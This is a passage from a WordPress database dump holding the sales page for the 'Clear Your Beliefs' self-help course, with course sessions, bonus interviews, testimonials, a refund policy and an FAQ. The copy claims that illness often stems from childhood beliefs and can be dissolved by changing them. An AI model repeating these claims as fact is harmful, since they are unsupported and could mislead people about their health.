thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul>\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb-purch">\n\n&nbsp;\n\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/1101aa80-782e-4650-acb8-2f1ae88e2cbd"><button class="btn first" style="padding: 10px 20px;">Purchase</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
